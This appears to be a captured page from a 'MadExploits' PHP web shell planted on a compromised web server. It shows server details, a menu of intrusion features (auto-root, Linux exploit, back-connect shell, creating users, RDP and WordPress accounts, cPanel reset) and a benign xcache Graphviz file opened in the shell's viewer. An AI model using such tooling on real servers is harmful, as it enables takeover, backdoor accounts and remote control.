Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
devel /
graph /
[ HOME SHELL ]
Name
Size
Permission
Action
cached_compile.dot
718
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cached_compile.dot
digraph tree { subgraph cluster_compiling { label="compiling"; php_compile; php_store; entry_store; } error [color=red]; origin_compile [color=red] begin -> origin_compile [label="compiling", color=red]; begin -> entry_init_key -> entry_lookup; edge [label=hit, color=blue] entry_lookup -> restore; php_lookup -> entry_store; edge [label=miss, color=green] entry_lookup -> md5_init; md5_init -> php_lookup; php_lookup -> php_compile; edge [label="", color=""] php_lookup -> origin_compile [label="miss but compiling", color=red]; php_compile -> php_store -> entry_store -> restore; edge [color=red]; md5_init -> error; php_compile -> error; php_store -> error; entry_store -> error; }
Close